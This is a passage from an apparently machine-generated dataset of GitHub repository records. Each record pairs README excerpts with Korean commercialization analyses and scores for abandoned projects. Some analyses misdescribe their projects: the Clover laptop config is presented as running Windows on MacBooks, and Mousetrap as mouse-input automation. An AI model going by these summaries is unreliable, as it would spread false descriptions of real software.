Walle\n[![Release Version](https://api.bintray.com/packages/meituan/maven/com.meituan.android.walle:library/images/download.svg)](https://github.com/Meituan-Dianping/walle/releases)\n[![Build Status](https://api.travis-ci.org/Meituan-Dianping/walle.svg?branch=master)](https://travis-ci.org/Meituan-Dianping/walle)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/Meituan-Dianping/walle/pulls)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://raw.githubusercontent.com/Meituan-Dianping/walle/master/LICENSE)\n\nWalle（瓦力）：Android Signature V2 Scheme签名下的新一代渠道包打包神器\n\n瓦力通过在Apk中的`APK Signature Block`区块添加自定义的渠道信息来生成渠道包，从而提高了渠道包生成效率，可以作为单机工具来使用，也可以部署在HTTP服务器上来实时处理渠道包Apk的升级网络请求。\n\n## Quick Start\n为了方便大家的使用，我们提供了2种使用方式：\n\n* Gradle插件方式，方便快速集成\n* 命令行方式，最大化满足各种自定义需求\n\n### Gradle插件使用方式\n#### 配置build.gradle\n\n在位于项目的根目录 `build.gradle` 文件中添加Walle Gradle插件的依赖， 如下：\n\n```groovy\nbuildscript {\n    dependencies {\n        classpath 'com.meituan.andr","composite_score":0.3389,"license_safety_tag":"safe"},{"name":"JakeWharton/RxBinding","github_url":"https://github.com/JakeWharton/RxBinding","stars":9,"language":"Kotlin","license":"apache-2.0","abandonment_months":55,"description":"# RxBinding 프로젝트 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 사용자 터치 입력과 화면 반응을 더 쉽게 처리할 수 있도록 도와주는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발 플랫폼**: 개발자들이 앱을 만들 때 이 도구를 구독하고 사용하는 SaaS 서비스\n2. **기업 앱 개발 팀 지원**: 대기업의 내부 개","readme_excerpt":"RxBinding\n=========\n\nRxJava binding APIs for Android UI widgets from the platform and support libraries.\n\n\nDownload\n--------\n\nPlatform bindings:\n```groovy\nimplementation 'com.jakewharton.rxbinding4:rxbinding:4.0.0'\n```\n\nAndroidX library bindings:\n```groovy\nimplementation 'com.jakewharton.rxbinding4:rxbinding-core:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-appcompat:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-drawerlayout:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-leanback:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-recyclerview:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-slidingpanelayout:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-swiperefreshlayout:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-viewpager:4.0.0'\nimplementation 'com.jakewharton.rxbinding4:rxbinding-viewpager2:4.0.0'\n```\n\nGoogle 'material' library bindings:\n```groovy\nimplementation 'com.jakewharton.rxbinding4:r","composite_score":0.3388,"license_safety_tag":"safe"},{"name":"clauderic/react-sortable-hoc","github_url":"https://github.com/clauderic/react-sortable-hoc","stars":9,"language":"JavaScript","license":"mit","abandonment_months":33,"description":"# react-sortable-hoc 분석 리포트\n\n## 왜 보물인가\n웹사이트에서 마우스로 드래그해서 항목 순서를 바꾸는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **할일 관리 SaaS**: 업무 목록의 우선순위를 드래그로 정렬하는 생산성 앱\n2. **이커머스 관리자 도구**: 상품 카테고리나 진열 순서를 관리자가 실시간으로","readme_excerpt":"> **Warning**\n>\n> This library is **no longer actively maintained**. It will continue to receive critical security updates, but there are no new features planned.\n> In future versions of React, the [`findDOMNode`](https://reactjs.org/docs/react-dom.html#finddomnode) method will be deprecated. This method is a critical piece of the architecture of `react-sortable-hoc`, and the library will stop working in the future when that method is removed from `react-dom`.\n>\n> All development efforts have been redirected towards [**@dnd-kit**](https://github.com/clauderic/dnd-kit). It provides feature parity, built with a modern and extensible architecture, supports complex use-cases and has accessibility features built-in. New consumers are strongly encouraged to adopt **@dnd-kit** instead of adopting `react-sortable-hoc`.\n\n<a href=\"https://github.com/clauderic/dnd-kit\"><img alt=\"Visit @dnd-kit github repository\" src=\".github/assets/dnd-kit-banner.svg\" /></a>\n\n# <img src=\".github/assets/react-sort","composite_score":0.3387,"license_safety_tag":"safe"},{"name":"brave/browser-laptop","github_url":"https://github.com/brave/browser-laptop","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":87,"description":"# Brave Browser 저장소 분석\n\n## 왜 보물인가\n광고 추적을 차단하고 사용자 프라이버시를 보호하는 웹브라우저의 핵심 기술로, 개인정보 보호에 민감한 현대인들의 니즈를 직접 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **엔터프라이즈 보안 솔루션**: 대기업 직원들의 업무 컴퓨터에 설치되는 보안 브라우저로 판매\n2. **개인정보보호 컨설팅 서비스","readme_excerpt":"[![Lint](https://badges.herokuapp.com/travis/brave/browser-laptop?env=TEST_DIR=lint&label=lint)](https://travis-ci.org/brave/browser-laptop)\n[![Unit Tests](https://badges.herokuapp.com/travis/brave/browser-laptop?env=TEST_DIR=unit&label=unit-tests)](https://travis-ci.org/brave/browser-laptop)\n[![codecov.io](https://codecov.io/github/brave/browser-laptop/coverage.svg?branch=master)](https://codecov.io/gh/brave/browser-laptop?branch=master)\n[![JavaScript Style Guide](https://img.shields.io/badge/code_style-standard-brightgreen.svg)](https://standardjs.com)\n[![Open Source Helpers](https://www.codetriage.com/brave/browser-laptop/badges/users.svg)](https://www.codetriage.com/brave/browser-laptop)\n\n# Brave Browser\n\nDesktop browser for macOS, Windows, and Linux.\n\n_**Deprecation notice: this repository is for the older Muon (our fork of Electron) version of Brave.**_<br>\n_**The newer version of the browser (`brave-core`) [can be found here](https://github.com/brave/brave-browser).**_<br>\n_**De","composite_score":0.3385,"license_safety_tag":"unknown"},{"name":"ccampbell/mousetrap","github_url":"https://github.com/ccampbell/mousetrap","stars":11,"language":"JavaScript","license":"apache-2.0","abandonment_months":39,"description":"# Mousetrap 저장소 분석\n\n## 왜 보물인가\n컴퓨터 키보드와 마우스 입력을 간단하게 제어할 수 있는 도구로, 반복적인 작업을 자동화하거나 접근성이 떨어지는 사용자들을 돕는 데 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **자동화 SaaS**: 사무 업무 자동화 서비스에서 사용자의 반복 작업(데이터 입력, 양식 작성 등)을 자동으로 처리하는 기능 ","readme_excerpt":"# Mousetrap\n[![CDNJS](https://img.shields.io/cdnjs/v/mousetrap.svg)](https://cdnjs.com/libraries/mousetrap)\n\nMousetrap is a simple library for handling keyboard shortcuts in Javascript.\n\nIt is licensed under the Apache 2.0 license.\n\nIt is around **2kb** minified and gzipped and **4.5kb** minified, has no external dependencies, and has been tested in the following browsers:\n\n- Internet Explorer 6+\n- Safari\n- Firefox\n- Chrome\n\nIt has support for `keypress`, `keydown`, and `keyup` events on specific keys, keyboard combinations, or key sequences.\n\n## Getting started\n\n1. Include mousetrap on your page before the closing `</body>` tag\n\n    ```html\n    <script src=\"/path/to/mousetrap.min.js\"></script>\n    ```\n\n    or install `mousetrap` from `npm` and require it\n\n    ```js\n    var Mousetrap = require('mousetrap');\n    ```\n\n2. Add some keyboard events to listen for\n\n    ```html\n    <script>\n        // single keys\n        Mousetrap.bind('4', function() { console.log('4'); });\n        Mousetrap.","composite_score":0.3385,"license_safety_tag":"safe"},{"name":"llSourcell/Learn_Data_Science_in_3_Months","github_url":"https://github.com/llSourcell/Learn_Data_Science_in_3_Months","stars":6,"language":"","license":"unknown","abandonment_months":67,"description":"# Learn_Data_Science_in_3_Months 분석\n\n## 왜 보물인가\n데이터 분석 업무에 필요한 기초 지식을 3개월 안에 습득할 수 있도록 체계적으로 정리한 학습 자료로, 비즈니스 의사결정에 필요한 데이터 해석 능력을 빠르게 키울 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 기업 직원 대상 온라인 교육 플랫폼으로, 월 ","readme_excerpt":"# Learn_Data_Science_in_3_Months\n\n#### Course Objective\n\nThis is the Curriculum for [Learn Data Science in 3 Months](https://youtu.be/9rDhY1P3YLA) by Siraj Raval on Youtube. After completing this course, start applying for jobs, doing contract work, start your own data science consulting group, or just keep on learning. Remember to believe in your ability to learn. You can learn data science, you will learn data science, and if you stick to it, eventually you will master it. \n\n## Find a study buddy\nJoin the #DataSciencein3Months channel in our [Slack](http://wizards.herokuapp.com) channel to find one. \n\n#### Components\n- 3 Projects \n- 1 Weekly assignment. Pick 1 from the course for each week, do it in a weekend. \n\n#### Course Length\n- 12 Weeks\n- 2-3 Hours of Study per Day\n\n#### Tools Used\n- Python, SQL, R, Tensorflow, Hadoop, MapReduce, Spark, GitHub, \n\n### Accelerated Learning Techniques\n- Watch videos at 2x or 3x speed using a browser extension\n- Handwrite notes as you watch for memo","composite_score":0.3385,"license_safety_tag":"unknown"},{"name":"soffes/SAMKeychain","github_url":"https://github.com/soffes/SAMKeychain","stars":7,"language":"Objective-C","license":"mit","abandonment_months":71,"description":"# SAMKeychain 분석 보고서\n\n## 왜 보물인가\n스마트폰에 저장된 비밀번호와 민감한 정보를 안전하게 보관하고 관리할 수 있는 기술로, 개인정보 보호가 점점 중요해지는 시대에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 서비스 앱**: 은행, 증권사 모바일 앱에 내장하여 사용자의 계정 정보와 거래 기록을 암호화된 상태로 보관\n2.","readme_excerpt":"# SAMKeychain\n\n[![Version](https://img.shields.io/github/release/soffes/SAMKeychain.svg)](https://github.com/soffes/SAMKeychain/releases)\n[![CocoaPods](https://img.shields.io/cocoapods/v/SAMKeychain.svg)](https://cocoapods.org/pods/SAMKeychain)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\nSAMKeychain is a simple wrapper for accessing accounts, getting passwords, setting passwords, and deleting passwords using the system Keychain on Mac OS X and iOS.\n\n## Adding to Your Project\n\nSimply add the following to your Podfile if you're using CocoaPods:\n\n``` ruby\npod 'SAMKeychain'\n```\n\nor Cartfile if you're using Carthage:\n\n```\ngithub \"soffes/SAMKeychain\"\n```\n\nTo manually add to your project:\n\n1. Add `Security.framework` to your target\n2. Add `SAMKeychain.h`, `SAMKeychain.m`, `SAMKeychainQuery.h`, and `SAMKeychainQuery.m` to your project.\n\nSAMKeychain requires ARC.\n\nNote: Currently SAMKeychain does not sup","composite_score":0.3382,"license_safety_tag":"safe"},{"name":"msracver/Deformable-ConvNets","github_url":"https://github.com/msracver/Deformable-ConvNets","stars":6,"language":"Python","license":"mit","abandonment_months":57,"description":"# Deformable-ConvNets 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 더 정확하게 인식하는 AI 기술로, 자율주행차, 보안카메라, 의료영상 분석 등 다양한 산업에 핵심적으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 사진 편집 플랫폼에서 물체 자동 감지 및 배경 제거 기능 제공\n2. **","readme_excerpt":"# Deformable Convolutional Networks\n\n## Update\n\n**[04/15/2019] The PyTorch version of deformable convolution operators are available in the [mmdetection codebase](https://github.com/open-mmlab/mmdetection). They are very efficient!**\n\n**[12/01/2018] We updated the deformable convolution operator to be the same as those utilized in the [Deformale ConvNets v2](https://arxiv.org/abs/1811.11168) paper. A possible issue when the sampling location is outside of image boundary is solved. The issue may cause deteriated performance on ImageNet classification. Note that the current deformable conv layers in both the official MXNet and the PyTorch codebase still have the issue. So if you want to reproduce the results in Deformable ConvNets v2, please utilize the updated layer provided here. The efficiency at large image batch size is also improved. See more details in [DCNv2_op/README.md](https://github.com/msracver/Deformable-ConvNets/blob/master/DCNv2_op/README.md).**\n\n* The full codebase of De","composite_score":0.3382,"license_safety_tag":"safe"},{"name":"michaelgrosner/tribeca","github_url":"https://github.com/michaelgrosner/tribeca","stars":10,"language":"TypeScript","license":"isc","abandonment_months":54,"description":"# Tribeca 저장소 분석\n\n## 왜 보물인가\n금융 거래 자동화 플랫폼으로, 개인 투자자들이 복잡한 매매 규칙을 코드 없이 설정하여 자동으로 거래할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 초보 투자자용 자동 거래 구독 플랫폼 (월 구독으로 월세처럼 이용)\n- **내부 업무 도구**: 대형 자산운용사의 거래팀을 위한 커","readme_excerpt":"# tribeca\n\n[![Join the chat at https://gitter.im/michaelgrosner/tribeca](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/michaelgrosner/tribeca?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n`tribeca` is a very low latency cryptocurrency [market making](https://github.com/michaelgrosner/tribeca/wiki#what-is-market-making) trading bot with a full featured [web client](https://github.com/michaelgrosner/tribeca#web-ui), [backtester](https://github.com/michaelgrosner/tribeca/wiki#how-can-i-test-new-trading-strategies), and supports direct connectivity to [several cryptocoin exchanges](https://github.com/michaelgrosner/tribeca#configuration). On modern hardware, it can react to market data by placing and canceling orders in under a millisecond. \n\n![Web UI Preview](https://raw.githubusercontent.com/michaelgrosner/tribeca/master/docs/web_ui_preview.png)\n\nRuns on the latest node.js (v7.8 or greater). Persistence is acheived using mongodb. Installation ","composite_score":0.3378,"license_safety_tag":"safe"},{"name":"mclaeo/polymarket-arbitrage","github_url":"https://github.com/mclaeo/polymarket-arbitrage","stars":146,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.3377,"license_safety_tag":"safe"},{"name":"EatingJan1/MCAnemometer-Ultrasonic","github_url":"https://github.com/EatingJan1/MCAnemometer-Ultrasonic","stars":1,"language":"C++","license":"MIT","abandonment_months":11,"description":"# MCAnemometer-Ultrasonic 분석 보고서\n\n## 왜 보물인가\n바람의 속도와 방향을 측정하는 초음파 풍속계 기술로, 기존 기계식 센서보다 정확하고 유지보수가 적게 드는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트 농업 SaaS 서비스**\n- 농부들이 스마트폰으로 포도밭이나 과수원의 바람 데이터를 실시간으로 모니터링하고, 해충 ","readme_excerpt":"# Anemometer - Arduino Library for Wind Measurement\n\nThis project provides an Arduino library to measure wind speed and direction using four ultrasonic sensors. It supports both square and rectangular sensor arrangements and includes functions for calibration, speed measurement, direction calculation, and gust detection.\n\n---\n\n## Introduction\n\nThe Anemometer library allows you to read wind data with an Arduino or an ESP32. Using ultrasonic sensors, it measures both the wind speed (in m/s) and wind direction (in degrees, where 0° corresponds to North, 90° to East, etc.).  \nThe library supports:\n- **Square Arrangement:** All four sensors are placed with the same distance.\n- **Rectangular Arrangement:** Different distances in the North-South and West-East directions.\n\n---\n\n## Required Materials\n\n- 4 Ultrasonic sensors (e.g., HC-SR04)\n\n---\n\n## Argument: Wiring and Hardware Connections  \n**Explanation:**  \nEach ultrasonic sensor has two essential pins:\n- **Trigger Pin (trig):** Initiates th","composite_score":0.3373,"license_safety_tag":"safe"},{"name":"h4cc/awesome-elixir","github_url":"https://github.com/h4cc/awesome-elixir","stars":5,"language":"Elixir","license":"MIT","abandonment_months":8,"description":"# awesome-elixir 저장소 분석\n\n## 왜 보물인가\n엘릭서라는 프로그래밍 언어의 유용한 도구와 라이브러리를 한곳에 모아놓은 가이드북으로, 개발자들이 빠르게 필요한 기술을 찾을 수 있게 정리되어 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 엘릭서 개발자를 위한 온라인 학습 플랫폼으로 전환하여 구독료 수익화\n- **내부 업무 도","readme_excerpt":"# Awesome Elixir [![CI Badge](https://github.com/h4cc/awesome-elixir/actions/workflows/ci.yml/badge.svg)](https://github.com/h4cc/awesome-elixir) [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\nA curated list of amazingly awesome Elixir libraries, resources, and shiny things inspired by [awesome-php](https://github.com/ziadoz/awesome-php).\n\nIf you think a package should be added, please add a :+1: (`:+1:`) at the according issue or create a new one.\n\nThere are [other sites with curated lists of elixir packages](#other-awesome-lists) which you can have a look at.\n\n- [Awesome Elixir  ](#awesome-elixir--)\n  - [Actors](#actors)\n  - [Algorithms and Data structures](#algorithms-and-data-structures)\n  - [Applications](#applications)\n  - [Artificial Intelligence](#artificial-intelligence)\n  - [Audio and Sounds](#audio-and-sounds)\n  - [Authentication](#authentication)\n  - [Authorization](","composite_score":0.337,"license_safety_tag":"safe"},{"name":"bhilburn/powerlevel9k","github_url":"https://github.com/bhilburn/powerlevel9k","stars":10,"language":"Shell","license":"mit","abandonment_months":74,"description":"# powerlevel9k 프로젝트 분석\n\n## 왜 보물인가\n개발자들이 일하는 화면(터미널)을 더 예쁘고 사용하기 편하게 만들어주는 인기 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 생산성 도구 플랫폼에서 클라우드 기반 터미널 환경 맞춤 설정 서비스로 제공\n2. **내부 업무 도구**: IT팀 교육용 통합 개발 환경 ","readme_excerpt":"## Powerlevel9k is deprecated and now unmaintained. Please use [Powerlevel10k](https://github.com/romkatv/powerlevel10k)!\n---\n![](https://raw.githubusercontent.com/bhilburn/powerlevel9k-logo/master/logo-banner.png)\n---\n[![Build Status](https://travis-ci.org/bhilburn/powerlevel9k.svg?branch=master)](https://travis-ci.org/bhilburn/powerlevel9k)\n[![Join the chat at https://gitter.im/bhilburn/powerlevel9k](https://badges.gitter.im/bhilburn/powerlevel9k.svg)](https://gitter.im/bhilburn/powerlevel9k?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nPowerlevel9k is a theme for ZSH which uses [Powerline\nFonts](https://github.com/powerline/fonts). It can be used with vanilla ZSH or\nZSH frameworks such as [Oh-My-Zsh](https://github.com/robbyrussell/oh-my-zsh),\n[Prezto](https://github.com/sorin-ionescu/prezto),\n[Antigen](https://github.com/zsh-users/antigen), and [many\nothers](https://github.com/bhilburn/powerlevel9k/wiki/Install-Instructions).\n\nGet more out of your term","composite_score":0.3369,"license_safety_tag":"safe"},{"name":"RehabMan/OS-X-Clover-Laptop-Config","github_url":"https://github.com/RehabMan/OS-X-Clover-Laptop-Config","stars":6,"language":"Shell","license":"gpl-2.0","abandonment_months":47,"description":"# RehabMan/OS-X-Clover-Laptop-Config 분석\n\n## 왜 보물인가\nMacBook 등 Apple 노트북에서 Windows를 쾌적하게 사용할 수 있도록 해주는 드물고 전문화된 설정 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Mac 사용자를 위한 Windows 설치 컨설팅 플랫폼 (자동 설정 파일 생성 및 배","readme_excerpt":"## Clover laptop config.plist and hotpatch\n\nThis project contains config.plist files for common laptops with Intel graphics.\n\nIt is linked by this guide: http://www.tonymacx86.com/el-capitan-laptop-support/148093-guide-booting-os-x-installer-laptops-clover.html\n\nRefer to the guide for details on usage of the various system specfic config*.plist files.\n\n--\n\nThere are also some handy SSDTs for use with Clover ACPI hotpatch (in conjunction with hotpatch/config.plist)\nIf you understand ACPI, you may find the SSDTs and hotpatch/config.plist quite useful.\n\nRead here for the hotpatch guide:\nhttps://www.tonymacx86.com/threads/guide-using-clover-to-hotpatch-acpi.200137/\n\nA brief description of each hotpatch SSDT is provided below:\n\nSSDT-RMCF.dsl\nThis file provides configuration data for other SSDTs.  Read the comments within the file for more information.\n\nSSDT-RMDT.dsl\nThis SSDT is for use with ACPIDebug.kext.  Instead of patching your DSDT to add the RMDT device, you can use this SSDT and ref","composite_score":0.3368,"license_safety_tag":"restricted"},{"name":"davideuler/architecture.taobao-alibaba","github_url":"https://github.com/davideuler/architecture.taobao-alibaba","stars":9,"language":"","license":"unknown","abandonment_months":45,"description":"","readme_excerpt":"# 互联网公司经典技术架构\n\n以数字开头的目录为互联网公司的架构文档。\n\n以英文字母A,B,C,D开头的目录按照主题分类的技术架构文档。\n\n在互联网公司架构文档中的资料，不重复放入按主题分类的目录中。  \n\n## 经典互联网公司技术架构\n\n[经典互联网技术架构](https://github.com/davideuler/architecture.of.internet-product)\n\n\n## 国内互联网公司技术架构\n[微信/腾讯技术架构](https://github.com/davideuler/architecture.wechat-tencent)\n\n[淘宝/阿里巴巴技术架构](https://github.com/davideuler/architecture.taobao-alibaba)\n\n[美团点评技术架构](https://github.com/davideuler/architecture.meituan-dianping)\n\n\n## 国内互联网公司开源项目\n\n[腾讯开源项目](https://github.com/Tencent/)\n\n[阿里巴巴开源项目](https://github.com/alibaba)\n\n[美团点评开源项目](https://github.com/meituan-dianping)  \n\n[百度开源项目](https://github.com/baidu)\n\n[奇虎360开源项目](https://github.com/qihoo360)\n\n\n\n## 提交经典技术架构文章\n欢迎提交 Pull Request, 或者 Github上面提交Issue， 贴上您觉得经典的架构介绍PPT/PDF或者网页URL。\n\n## 互联网架构/电商/高并发架构交流QQ群\n\n群名称：互联网公司架构交流\n\n群号：895960322\n\n不定期分享一线互联网公司技术架构，电商架构，高并发系统架构，大数据架构，QQ扫码入群：\n\n![互联网公司架构交流QQ群](https://github.com/davideuler/architecture.of.internet-product/raw/master/%E5%85%B6%E4%BB%96/architecture-qq-group.png)\n","composite_score":0.3367,"license_safety_tag":"unknown"},{"name":"Flipboard/react-canvas","github_url":"https://github.com/Flipboard/react-canvas","stars":5,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":45,"description":"# Flipboard/react-canvas 분석\n\n## 왜 보물인가\n웹에서 그림을 그리거나 복잡한 시각 효과를 만들 때 필요한 핵심 도구로, 뉴스 앱의 거대 기업 Flipboard가 공개한 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 디자인 도구 SaaS** - 브라우저에서 바로 그림을 그리거나 편집할 수 있는 웹 기반 디자인 애플리케","readme_excerpt":"# react-canvas\n\n[Introductory blog post](http://engineering.flipboard.com/2015/02/mobile-web)\n\nReact Canvas adds the ability for React components to render to `<canvas>` rather than DOM.\n\nThis project is a work-in-progress. Though much of the code is in production on flipboard.com, the React canvas bindings are relatively new and the API is subject to change.\n\n## Motivation\n\nHaving a long history of building interfaces geared toward mobile devices, we found that the reason mobile web apps feel slow when compared to native apps is the DOM. CSS animations and transitions are the fastest path to smooth animations on the web, but they have several limitations. React Canvas leverages the fact that most modern mobile browsers now have hardware accelerated canvas.\n\nWhile there have been other attempts to bind canvas drawing APIs to React, they are more focused on visualizations and games. Where React Canvas differs is in the focus on building application user interfaces. The fact that it rend","composite_score":0.3367,"license_safety_tag":"safe"},{"name":"GoogleChrome/rendertron","github_url":"https://github.com/GoogleChrome/rendertron","stars":30,"language":"TypeScript","license":"apache-2.0","abandonment_months":44,"description":"# GoogleChrome/Rendertron 분석\n\n## 왜 보물인가\n웹사이트를 검색 엔진이 잘 읽을 수 있도록 자동으로 변환해주는 도구로, 온라인 비즈니스의 검색 노출도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 웹사이트를 자동으로 최적화하는 구독형 서비스로 월정액을 받으며, 클라이언트는 개별 설정 없이","readme_excerpt":"# Rendertron\n\n[![CI](https://github.com/GoogleChrome/rendertron/workflows/CI/badge.svg)](https://github.com/GoogleChrome/rendertron/actions)\n[![NPM package](https://img.shields.io/npm/v/rendertron.svg)](https://npmjs.org/package/rendertron)\n\n\n## Rendertron is deprecated\n\nPlease note that this project is **deprecated**. Dynamic rendering [is not a recommended approach](https://developers.google.com/search/docs/crawling-indexing/javascript/dynamic-rendering) and [there are better approaches to rendering on the web](https://web.dev/rendering-on-the-web/).\n\n**Rendertron will not be actively maintained at this point.**\n\n> Rendertron is a headless Chrome rendering solution designed to render & serialise web pages on the fly.\n\n#### :hammer: Built with [Puppeteer](https://github.com/GoogleChrome/puppeteer)\n\n#### :cloud: Easy deployment to Google Cloud\n\n#### :mag: Improves SEO\n\nRendertron is designed to enable your Progressive Web App (PWA) to serve the correct\ncontent to any bot that doesn't r","composite_score":0.3366,"license_safety_tag":"safe"},{"name":"olucurious/Awesome-ARKit","github_url":"https://github.com/olucurious/Awesome-ARKit","stars":10,"language":"Swift","license":"unknown","abandonment_months":25,"description":"# Awesome-ARKit 분석\n\n## 왜 보물인가\n스마트폰 카메라로 현실에 가상 물체를 겹쳐 보여주는 증강현실(AR) 기술의 다양한 활용 사례와 개발 자료들을 한곳에 정리한 참고 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **AR 기반 전자상거래 SaaS**: 가구·의류 매장에서 실제 집/몸에 맞춰보는 가상 피팅 서비스 ($99~499/월)\n2.","readme_excerpt":"# Awesome ARKit [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n[![Build Status](https://api.travis-ci.org/olucurious/Awesome-ARKit.svg?branch=master)](https://travis-ci.com/olucurious/Awesome-ARKit)\n\n![Banner](https://raw.githubusercontent.com/olucurious/awesome-arkit/master/banner.png)\n\nA curated list of awesome ARKit projects and resources. Feel free to contribute!\n\nARKit is a new framework that allows you to easily create unparalleled augmented reality experiences for iPhone and iPad. By blending digital objects and information with the environment around you, ARKit takes apps beyond the screen, freeing them to interact with the real world in entirely new ways.\n\n- [Projects](#projects)\n- [AppStore](#appstore)\n- [Tutorials](#tutorials)\n- [Resources](#resources)\n\n- - -\n\n# Projects\n\n* [Baraba](https://github.com/nsoojin/baraba) - Make your UIScrollView scroll automatically when","composite_score":0.3366,"license_safety_tag":"unknown"},{"name":"a312863063/generators-with-stylegan2","github_url":"https://github.com/a312863063/generators-with-stylegan2","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":16,"description":"# a312863063/generators-with-stylegan2 평가\n\n## 왜 보물인가\n인공지능으로 사람 얼굴이나 예술 이미지를 자동 생성하는 기술로, 게임·영화·광고 등 다양한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **게임사 SaaS**: 캐릭터 일러스트 자동 생성 서비스를 게임사에 월 구독료로 판매\n2. **광고 대행사","readme_excerpt":"# 基于StyleGAN2的新版人脸生成器\n<i>Read English Introduction：<a href='https://github.com/a312863063/generators-with-stylegan2/blob/master/README_EN.md'>Here</a></i><br />\n<br />\n&emsp;&emsp;这儿是一批基于StyleGAN2制作的新版人脸生成器，既包含基于旧版重制的<a href='https://github.com/a312863063/seeprettyface-generator-wanghong'>网红脸</a>，<a href='https://github.com/a312863063/seeprettyface-generator-star'>明星脸</a>，<a href='https://github.com/a312863063/seeprettyface-generator-model'>超模脸</a>，<a href='https://github.com/a312863063/seeprettyface-generator-babies'>萌娃脸</a>和<a href='https://github.com/a312863063/seeprettyface-generator-yellow'>黄种人脸</a>生成器，也新增了两款更具美学意义的<a href='#'>混血脸</a>和<a href='#'>亚洲美人脸</a>生成器，并附赠有通配的人脸属性编辑器。做了这么多款生成器已经足够用，我将不再尝试做人脸生成器相关的新内容，而是去探索更实用、更能满足用户需求的生成技术，以更好地服务人民（譬如<a href='https://github.com/a312863063/Video-Auto-Wipe'>Video-Auto-Wipe</a>可以了解一下）。<br />\n&emsp;&emsp;生成器的作用是可提供我们各种样式的人脸素材，供我们在多种场景下应用并有助于节省寻找真人（人脸）的成本，值得注意的是，<b>每张人脸都是不存在于这个世界上的AI虚拟人物，他们独特且永不重复。</b>\n\n<br /><br /><br />\n## 新版的提升与价值何在？\n&emsp;&e","composite_score":0.3363,"license_safety_tag":"unknown"},{"name":"tomastrajan/angular-ngrx-material-starter","github_url":"https://github.com/tomastrajan/angular-ngrx-material-starter","stars":5,"language":"TypeScript","license":"mit","abandonment_months":43,"description":"# angular-ngrx-material-starter 분석\n\n## 왜 보물인가\n기업용 웹 애플리케이션을 빠르게 만들 수 있는 완성된 설계도 역할을 하므로, 개발 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원들이 사용하는 프로젝트 관리, 재무 관리 등의 웹 서비스 기반으로 빠르게 런칭 가능\n- ","readme_excerpt":"# Angular 12, NgRx and Angular Material Starter\n\nby [@tomastrajan](https://twitter.com/tomastrajan)\n\n<a href=\"https://www.buymeacoffee.com/tomastrajan\" target=\"_blank\"><img src=\"https://cdn.buymeacoffee.com/buttons/v2/default-red.png\" alt=\"Buy Me A Coffee\" height=\"34\" ></a>\n\n[![license](https://img.shields.io/github/license/tomastrajan/angular-ngrx-material-starter.svg)](https://github.com/tomastrajan/angular-ngrx-material-starter/blob/master/LICENSE) [![All Contributors](https://img.shields.io/badge/all_contributors-37-orange.svg?style=flat-square)](#contributors) [![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)](https://github.com/prettier/prettier) [![Build Status](https://travis-ci.org/tomastrajan/angular-ngrx-material-starter.svg?branch=master)](https://travis-ci.org/tomastrajan/angular-ngrx-material-starter)\n[![Codecov](https://img.shields.io/codecov/c/github/tomastrajan/angular-ngrx-material-starter.svg)](https://codecov.io/gh/tomastrajan/ang","composite_score":0.3362,"license_safety_tag":"safe"},{"name":"InfiniTensor/learning-tools","github_url":"https://github.com/InfiniTensor/learning-tools","stars":10,"language":"Rust","license":"MIT","abandonment_months":10,"description":"","readme_excerpt":"","composite_score":0.3362,"license_safety_tag":"safe"},{"name":"devias-io/material-kit-react","github_url":"https://github.com/devias-io/material-kit-react","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":12,"description":"# Material Kit React 분석 보고서\n\n## 왜 보물인가\n디자인을 신경 써야 하는 웹사이트나 앱을 만들 때 처음부터 예쁘게 만들 수 있는 '디자인 템플릿 모음'이기 